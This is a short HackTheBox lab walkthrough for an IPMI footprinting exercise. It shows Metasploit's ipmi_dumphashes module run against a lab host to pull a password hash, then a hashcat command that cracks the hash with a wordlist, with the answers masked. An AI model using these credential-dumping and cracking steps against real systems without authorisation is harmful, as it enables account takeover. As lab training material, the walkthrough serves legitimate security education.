IPMI

ℹ️ Informations¶

🌐 Website: HackTheBox
📚 Module: Footprinting
🔗 Link: IPMI

❓Question¶

What username is configured for accessing the host via IPMI?

📋 Walkthrough¶

Let's use msfconsole to scan the server.

msf6 auxiliary(scanner/ipmi/ipmi_version) > use auxiliary/scanner/ipmi/ipmi_dumphashes 
msf6 auxiliary(scanner/ipmi/ipmi_dumphashes) > set rhosts 10.129.88.138
rhosts => 10.129.88.138
msf6 auxiliary(scanner/ipmi/ipmi_dumphashes) > run

[+] 10.129.88.138:623 - IPMI - Hash found: a****:*****************************************:**************************
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

Answer

a****

❓Question¶

What is the account's cleartext password?

📋 Walkthrough¶

To crack the hash from the previous step, we can use hashcat

hashcat -m 7300 hash -a 0 /usr/share/wordlists/rockyou.txt --username

Answer

t******